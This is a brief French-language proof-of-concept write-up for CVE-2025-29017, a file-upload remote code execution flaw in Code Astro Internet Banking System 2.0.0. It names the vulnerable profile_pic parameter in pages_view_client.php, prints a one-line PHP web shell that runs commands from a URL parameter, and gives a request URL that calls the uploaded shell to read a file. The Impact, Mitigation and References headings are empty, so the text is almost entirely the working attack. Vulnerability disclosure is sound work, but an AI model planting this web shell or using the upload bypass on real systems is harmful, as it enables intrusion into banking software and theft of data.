
Exploit de preuve de concept pour CVE-2025-29017, démontrant une exécution de code à distance via le téléchargement d'un fichier malveillant dans Code Astro Internet Banking System 2.0.0.
Une vulnérabilité d'exécution de code à distance (RCE) existe dans Code Astro Internet Banking System 2.0.0 en raison d'une validation incorrecte du téléversement de fichiers dans le paramètre profile_pic du fichier pages_view_client.php. Les attaquants peuvent contourner les contrôles de sécurité en modifiant la requête de téléversement, ce qui conduit à l'exécution de code arbitraire.
profile_pic dans pages_view_client.php


<?php system($_GET['cmd']); ?>


http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt

Impact
Atténuation
Références